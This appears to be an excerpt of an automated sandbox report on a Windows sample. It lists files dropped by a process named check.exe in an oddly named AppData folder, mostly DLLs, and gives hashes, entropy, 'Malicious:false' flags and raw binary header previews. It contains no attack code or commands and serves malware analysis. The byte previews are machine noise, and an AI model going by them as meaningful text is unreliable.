                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.0.8.<./.P.i.
                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4735
                                                                                                                                                                                                            Entropy (8bit):4.429581178590269
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsHJg771I974WpW8VY/jYm8M4JbWDFnAoMyq8vuWpqcMZDQcS6d:uIjfpI7sx7VXJSZNMW3pqcMlC6d
                                                                                                                                                                                                            MD5:BC46D797BAA9130D1675C5AC10E06BDF
                                                                                                                                                                                                            SHA1:F1B1805CA9864F6A7D7B47F9BAE02A042E2EC051
                                                                                                                                                                                                            SHA-256:1AA4AF6C197A9459CCCAAF1CA8CF22FE89502CBBBF5C7B0646BDBD5352F0F64F
                                                                                                                                                                                                            SHA-512:6ADD8B1052E02636DE28A6D78D4F7B142818DBA00AE3E7A7CE295302CA562716E57924AB8638D475B641E277F524B54D738FBC74CDF416448E067A11B7FD7445
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="623954" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1464
                                                                                                                                                                                                            Entropy (8bit):5.324666598568697
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:39w/SKco4KmBs4RPT6BmFoUvjKzu1o+m9qr9txNBJt/NKwJ0hNuTx9r8Hv9ILAl/:Nw/SU4y4RQmFoUL5a+m9qr9trBLNGhNX
                                                                                                                                                                                                            MD5:72C26D4FBD5D80476E711A58F2F30419
                                                                                                                                                                                                            SHA1:E21D5738B6962D68A428F3626AEAEA3F02CED253
                                                                                                                                                                                                            SHA-256:967DB24C5616345AA1FCBEFC85FD490737A849850CD615F1A7EA8742E715824A
                                                                                                                                                                                                            SHA-512:A6515CCA426294F0DE66B5DC861D2EAE964CBDAA52643F5A88BA770869866FE86011E10E4D6B7B9AAC11D8B0BA3CB55307C3262B3EF1C1A114ED68A3E4E443E6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:@...e...........)....................................@..........@...............|.jdY\.H.s9.!..|(.......System.IO.Compression...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.<...............i..VdqF...|...........System.Configuration4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P................1]...E...........(.Microsoft.PowerShell.Commands.Management
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):590112
                                                                                                                                                                                                            Entropy (8bit):6.461874649448891
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:xI88L4Wu4+oJ+xc39ax5Ms4ETs3rxSvYcRkdQEKZm+jWodEEVh51:xD89rxZfQEKZm+jWodEEP5
                                                                                                                                                                                                            MD5:01B946A2EDC5CC166DE018DBB754B69C
                                                                                                                                                                                                            SHA1:DBE09B7B9AB2D1A61EF63395111D2EB9B04F0A46
                                                                                                                                                                                                            SHA-256:88F55D86B50B0A7E55E71AD2D8F7552146BA26E927230DAF2E26AD3A971973C5
                                                                                                                                                                                                            SHA-512:65DC3F32FAF30E62DFDECB72775DF870AF4C3A32A0BF576ED1AAAE4B16AC6897B62B19E01DC2BF46F46FBE3F475C061F79CBE987EDA583FEE1817070779860E5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........LS..-=..-=..-=.....-=..U...-=..-<.k-=.gB<..-=.gB9..-=.gB>..-=.gB8.=-=.gB=..-=.gB..-=.gB?..-=.Rich.-=.........PE..d.....t^.........." .....@..........."...............................................z....`A.........................................j..h....D..,...............L;...... A......(...@...8...............................0............P.......f..@....................text...,>.......@.................. ..`.rdata..r....P.......D..............@..@.data....:...`..."...N..............@....pdata..L;.......<...p..............@..@.didat..h...........................@....rsrc...............................@..@.reloc..(...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):31728
                                                                                                                                                                                                            Entropy (8bit):6.499754548353504
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:rOY/H1SbuIqnX8ndnWc95gW3C8c+pBj0HRN7bULkcyHRN7rxTO6iuQl9xiv:yYIBqnMdxxWd4urv
                                                                                                                                                                                                            MD5:0FE6D52EB94C848FE258DC0EC9FF4C11
                                                                                                                                                                                                            SHA1:95CC74C64AB80785F3893D61A73B8A958D24DA29
                                                                                                                                                                                                            SHA-256:446C48C1224C289BD3080087FE15D6759416D64F4136ADDF30086ABD5415D83F
                                                                                                                                                                                                            SHA-512:C39A134210E314627B0F2072F4FFC9B2CE060D44D3365D11D8C1FE908B3B9403EBDD6F33E67D556BD052338D0ED3D5F16B54D628E8290FD3A155F55D36019A86
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......>.{.zl..zl..zl......xl..s...~l.....}l.....xl..zl..Ql......l.....il.....{l.....{l.....{l..Richzl..................PE..d.....t^.........." .........$......p.....................................................`A........................................p>..L....?..x....p.......`..X....:...A......p...P3..8............................3..0............0..@............................text............................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata..X....`.......0..............@..@.rsrc........p.......4..............@..@.reloc..p............8..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6023664
                                                                                                                                                                                                            Entropy (8bit):6.768988071491288
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:98304:hcirJylHYab/6bMJsv6tWKFdu9CLiZxqfg8gwf:+irJylHFb/QMJsv6tWKFdu9CL4xqfg8x
                                                                                                                                                                                                            MD5:817520432A42EFA345B2D97F5C24510E
                                                                                                                                                                                                            SHA1:FEA7B9C61569D7E76AF5EFFD726B7FF6147961E5
                                                                                                                                                                                                            SHA-256:8D2FF4CE9096DDCCC4F4CD62C2E41FC854CFD1B0D6E8D296645A7F5FD4AE565A
                                                                                                                                                                                                            SHA-512:8673B26EC5421FCE8E23ADF720DE5690673BB4CE6116CB44EBCC61BBBEF12C0AD286DFD675EDBED5D8D000EFD7609C81AAE4533180CF4EC9CD5316E7028F7441
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......D.............................UJ......................................................W.....,..................r....................Rich............PE..d...;._.........." ..........-.......-......................................`\.....x.\...`...........................................L..O....T...... \.......U.. ....[......0\..%..,.H.T.....................H.(.....H.0............./.H............................text............................... ..`.rdata..F7%.../..8%.................@..@.data...x....PT..\...6T.............@....pdata... ....U.."....T.............@..@.qtmimed.....0W.......V.............@..P.rsrc........ \.......[.............@..@.reloc...%...0\..&....[.............@..B........................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):436720
                                                                                                                                                                                                            Entropy (8bit):6.392610185061176
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:ZLvnUJ17UTGOkWHUe/W9TgYMDu96ixMZQ8IlXbKgp8aIDeN:KP7cGOGegTwu96ixMZQtlrPN
                                                                                                                                                                                                            MD5:0E8FF02D971B61B5D2DD1AC4DF01AE4A
                                                                                                                                                                                                            SHA1:638F0B46730884FA036900649F69F3021557E2FE
                                                                                                                                                                                                            SHA-256:1AA70B106A10C86946E23CAA9FC752DC16E29FBE803BBA1F1AB30D1C63EE852A
                                                                                                                                                                                                            SHA-512:7BA616EDE66B16D9F8B2A56C3117DB49A74D59D0D32EAA6958DE57EAC78F14B1C7F2DBBA9EAE4D77937399CF14D44535531BAF6F9DB16F357F8712DFAAE4346A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D..*..*..*.....*...+..*.../..*.......*...)..*...+..*.O.+..*..+...*.O./..*.O.*..*.O....*.....*.O.(..*.Rich.*.........................PE..d...]._.........." .....\...<.......\..............................................K.....`..........................................h..to...................`...Q..............4.......T.......................(...`...0............p...............................text...yZ.......\.................. ..`.rdata..0....p.......`..............@..@.data...X....@......."..............@....pdata...Q...`...R...2..............@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7008240
                                                                                                                                                                                                            Entropy (8bit):6.674290383197779
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:9VPhJZWVvpg+za3cFlc61j2VjBW77I4iNlmLPycNRncuUx24LLsXZFC6FOCfDt2/:BJZzI1ZR3U9Cxc22aDACInVc4Z
                                                                                                                                                                                                            MD5:47307A1E2E9987AB422F09771D590FF1
                                                                                                                                                                                                            SHA1:0DFC3A947E56C749A75F921F4A850A3DCBF04248
                                                                                                                                                                                                            SHA-256:5E7D2D41B8B92A880E83B8CC0CA173F5DA61218604186196787EE1600956BE1E
                                                                                                                                                                                                            SHA-512:21B1C133334C7CA7BBBE4F00A689C580FF80005749DA1AA453CCEB293F1AD99F459CA954F54E93B249D406AEA038AD3D44D667899B73014F884AFDBD9C461C14
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......QH^~.)0-.)0-.)0-.Q.-.)0-...-.)0-.F4,.)0-.F3,.)0-.F5,.)0-.F1,.)0-.Y1,.)0-.B5,.)0-.B1,.)0-.)1-m,0-.Y4,.)0-.Y5,|(0-.Y0,.)0-.Y.-.)0-.).-.)0-.Y2,.)0-Rich.)0-................PE..d....._.........." ......?...+.....X.?.......................................k.....R.k...`.........................................pKK.....d.e.|....`k.......g.......j......pk..6....F.T................... .F.(.....F.0.............?.p+...........................text...2.?.......?................. ..`.rdata...z&...?..|&...?.............@..@.data....o... f.......f.............@....pdata........g.......f.............@..@.rsrc........`k.......j.............@..@.reloc...6...pk..8....j.............@..B........................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1340400
                                                                                                                                                                                                            Entropy (8bit):6.41486755163134
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:eXPn73RXox1U9M0m+1ffSDY565RzHUY1iaRy95hdGehEM:+7hXU1U95m4ff9A5RviaRy9NGI
                                                                                                                                                                                                            MD5:3569693D5BAE82854DE1D88F86C33184
                                                                                                                                                                                                            SHA1:1A6084ACFD2AA4D32CEDFB7D9023F60EB14E1771
                                                                                                                                                                                                            SHA-256:4EF341AE9302E793878020F0740B09B0F31CB380408A697F75C69FDBD20FC7A1
                                                                                                                                                                                                            SHA-512:E5EFF4A79E1BDAE28A6CA0DA116245A9919023560750FC4A087CDCD0AB969C2F0EEEC63BBEC2CD5222D6824A01DD27D2A8E6684A48202EA733F9BB2FAB048B32
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........Yt..7'..7'..7'...'..7'..3&..7'}.3&..7'}.4&..7'}.2&..7'}.6&..7'..6&..7'0.6&..7'..6'c.7'0.2&2.7'0.7&..7'0..'..7'...'..7'0.5&..7'Rich..7'........................PE..d....._.........." .................................................................c....`......................................... ....n..,...h....................X..........,.......T...................p...(...@...0............................................text...C........................... ..`.rdata...g.......h..................@..@.data...XN...@...2... ..............@....pdata...............R..............@..@.rsrc................>..............@..@.reloc..,............D..............@..B................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3591664
                                                                                                                                                                                                            Entropy (8bit):6.333693598000157
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:98304:iPnt09+kVh2NrSdSG779LLLS/o/L4YqoY0Xba+mRRH2T:iPnt2ZVhT
                                                                                                                                                                                                            MD5:D055566B5168D7B1D4E307C41CE47C4B
                                                                                                                                                                                                            SHA1:043C0056E9951DA79EC94A66A784972532DC18EF
                                                                                                                                                                                                            SHA-256:30035484C81590976627F8FACE9507CAA8581A7DC7630CCCF6A8D6DE65CAB707
                                                                                                                                                                                                            SHA-512:4F12D17AA8A3008CAA3DDD0E41D3ED713A24F9B5A465EE93B2E4BECCF876D5BDF0259AA0D2DD77AD61BB59DC871F78937FFBE4D0F60638014E8EA8A27CAF228D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.4...Z...Z...Z......Z..^...Z..Y...Z.._...Z..[...Z...[...Z...[...Z...[...Z..._...Z...Z...Z.......Z......Z...X...Z.Rich..Z.........PE..d......_.........." .....^$..........O$.......................................7.....}.7...`...........................................,......2.......6.......4. .....6.......6..J....).T.....................).(...p.).0............p$..%...........................text....\$......^$................. ..`.rdata......p$......b$.............@..@.data.........3..n....2.............@....pdata.. .....4......l4.............@..@.rsrc.........6......`6.............@..@.reloc...J....6..L...f6.............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):438768
                                                                                                                                                                                                            Entropy (8bit):6.312090336793804
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:k1tE6lq982HdyuEZ5gw+VHDZjZ0yOWm7Vdcm4GyasLCZCu6vdQp:k1tEuq9Hdyuo5gwguyOtVIup
                                                                                                                                                                                                            MD5:2030C4177B499E6118BE5B9E5761FCE1
                                                                                                                                                                                                            SHA1:050D0E67C4AA890C80F46CF615431004F2F4F8FC
                                                                                                                                                                                                            SHA-256:51E4E5A5E91F78774C44F69B599FAE4735277EF2918F7061778615CB5C4F6E81
                                                                                                                                                                                                            SHA-512:488F7D5D9D8DEEE9BBB9D63DAE346E46EFEB62456279F388B323777999B597C2D5AEA0EE379BDF94C9CBCFD3367D344FB6B5E90AC40BE2CE95EFA5BBDD363BCC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..<...<...<...5.H.4...(...>.......*.......4.......8.......8......9...<...g....../......=....$.=...<.L.=......=...Rich<...................PE..d...M.._.........." .....(...r......d+..............................................MF....`.........................................0E...^..0................`.. F..................H...T.......................(.......0............@...............................text...N&.......(.................. ..`.rdata.......@.......,..............@..@.data...x/...0...(..................@....pdata.. F...`...H...>..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4148720
                                                                                                                                                                                                            Entropy (8bit):6.462183686222023
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:EcDwCQsvkBD+ClI3IAVLA7Tr15SokomoqxQhT2bAssCFEUGX5ig:E7CKPsA3p0Z/QV/sS3Ag
                                                                                                                                                                                                            MD5:65F59CFC0C1C060CE20D3B9CEFFBAF46
                                                                                                                                                                                                            SHA1:CFD56D77506CD8C0671CA559D659DAB39E4AD3C2
                                                                                                                                                                                                            SHA-256:C81AD3C1111544064B1830C6F1AEF3C1FD13B401546AB3B852D697C0F4D854B3
                                                                                                                                                                                                            SHA-512:D6F6DC19F1A0495026CBA765B5A2414B6AF0DBFC37B5ACEED1CD0AE37B3B0F574B759A176D75B01EDD74C6CE9A3642D3D29A3FD7F166B53A41C8978F562B4B50
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!Fvge'.4e'.4e'.4l_.4i'.4.H.5m'.4.H.5a'.4.H.5|'.4.H.5c'.4.W.5o'.4qL.5`'.4e'.4.,.4.W.5.'.4.W.5d'.4.W.4d'.4e'.4d'.4.W.5d'.4Riche'.4........................PE..d......_.........." ......%..B......L.$.......................................?.......?...`.........................................0)2.P.....8.T.....>.......<..^...2?.......?.py......T.......................(.......0............ %..\...........................text.....%.......%................. ..`.rdata....... %.......%.............@..@.data....I...@;..2... ;.............@....pdata...^....<..`...R<.............@..@.rsrc.........>.......>.............@..@.reloc..py....?..z....>.............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):330736
                                                                                                                                                                                                            Entropy (8bit):6.381828869454302
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:6qLZcTC3wR/0JNZ+csBkBv0L0hq+SvcO8MsvwbIeblsjTR:6qNcCwqHE2fYlsPR
                                                                                                                                                                                                            MD5:03761F923E52A7269A6E3A7452F6BE93
                                                                                                                                                                                                            SHA1:2CE53C424336BCC8047E10FA79CE9BCE14059C50
                                                                                                                                                                                                            SHA-256:7348CFC6444438B8845FB3F59381227325D40CA2187D463E82FC7B8E93E38DB5
                                                                                                                                                                                                            SHA-512:DE0FF8EBFFC62AF279E239722E6EEDD0B46BC213E21D0A687572BFB92AE1A1E4219322233224CA8B7211FFEF52D26CB9FE171D175D2390E3B3E6710BBDA010CB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............_._._..*_._,.^._..^._,.^._,.^._,.^._a.^._._=.._a.^._a.^._a.F_._.._._a.^._Rich._................PE..d......_.........." .........................................................@.......^....`.................................................((....... ...........0...........0..H...xL..T....................N..(....L..0............................................text............................... ..`.rdata..p...........................@..@.data...8...........................@....pdata...0.......2..................@..@.rsrc........ ......................@..@.reloc..H....0......................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):149488
                                                                                                                                                                                                            Entropy (8bit):6.116105454277536
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:4sSkET6pEXb3loojg1Q2sorWvZXF2sorrLA7cG27Qhvvc:4sSd6pwzloDbsnX0sCrc7ct7QVc
                                                                                                                                                                                                            MD5:A016545F963548E0F37885E07EF945C7
                                                                                                                                                                                                            SHA1:CBE499E53AB0BD2DA21018F4E2092E33560C846F
                                                                                                                                                                                                            SHA-256:6B56F77DA6F17880A42D2F9D2EC8B426248F7AB2196A0F55D37ADE39E3878BC6
                                                                                                                                                                                                            SHA-512:47A3C965593B97392F8995C7B80394E5368D735D4C77F610AFD61367FFE7658A0E83A0DBD19962C4FA864D94F245A9185A915010AFA23467F999C833982654C2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........'`.CF.KCF.KCF.KJ>.KGF.K.).JAF.KW-.JAF.K.).JVF.K.).JKF.K.).J@F.K.6.JFF.KCF.K.G.K.6.JPF.K.6.JBF.K.6.KBF.KCF.KBF.K.6.JBF.KRichCF.K........................PE..d......_.........." .....$..........t(.......................................p.......5....`............................................."..l........P.......0.......,.......`..L...hw..T....................x..(....w..0............@...............................text....".......$.................. ..`.rdata..z....@.......(..............@..@.data...x...........................@....pdata.......0......................@..@.rsrc........P......."..............@..@.reloc..L....`.......(..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5498352
                                                                                                                                                                                                            Entropy (8bit):6.619117060971844
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:KO+LIFYAPZtMym9RRQ7/KKIXSewIa/2Xqq1sfeOoKGOh6EwNmiHYYwBrK8KMlH0p:IGoKZdRqJD10rK8KMlH0gi5GX0oKZ
                                                                                                                                                                                                            MD5:4CD1F8FDCD617932DB131C3688845EA8
                                                                                                                                                                                                            SHA1:B090ED884B07D2D98747141AEFD25590B8B254F9
                                                                                                                                                                                                            SHA-256:3788C669D4B645E5A576DE9FC77FCA776BF516D43C89143DC2CA28291BA14358
                                                                                                                                                                                                            SHA-512:7D47D2661BF8FAC937F0D168036652B7CFE0D749B571D9773A5446C512C58EE6BB081FEC817181A90F4543EBC2367C7F8881FF7F80908AA48A7F6BB261F1D199
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x..................I.......I.......I.......I...........................................9.................................Rich............PE..d....._.........." ......3..P .......3.......................................T......MT...`.........................................0.D.P^....L.h....pS......0P..8....S.......S.d.....?.T...................`.?.(...0.?.0.............3.._...........................text.....3.......3................. ..`.rdata..8.....3.......3.............@..@.data.........O......dO.............@....pdata...8...0P..:....O.............@..@.rsrc........pS......4S.............@..@.reloc..d.....S......:S.............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):101872
                                                                                                                                                                                                            Entropy (8bit):6.5661918084228725
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:RCKWZGuEK0mOLSTxoPl9GIcuZrxi4hXX9oix8H+NCIecbGShwZul:RFWY1WxgGStJ8H2CIecbG36
                                                                                                                                                                                                            MD5:971DBBE854FC6AB78C095607DFAD7B5C
                                                                                                                                                                                                            SHA1:1731FB947CD85F9017A95FDA1DC5E3B0F6B42CA2
                                                                                                                                                                                                            SHA-256:5E197A086B6A7711BAA09AFE4EA7C68F0E777B2FF33F1DF25A21F375B7D9693A
                                                                                                                                                                                                            SHA-512:B966AAB9C0D9459FADA3E5E96998292D6874A7078924EA2C171F0A1A50B0784C24CC408D00852BEC48D6A01E67E41D017684631176D3E90151EC692161F1814D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w.............t:..............................................................Rich....................PE..d.....t^.........." .........^.......................................................e....`A.........................................0..4....9.......p.......P.......L...A..............8........................... ...0............................................text...2........................... ..`.rdata...?.......@..................@..@.data...0....@.......4..............@....pdata.......P.......8..............@..@_RDATA.......`.......D..............@..@.rsrc........p.......F..............@..@.reloc...............J..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
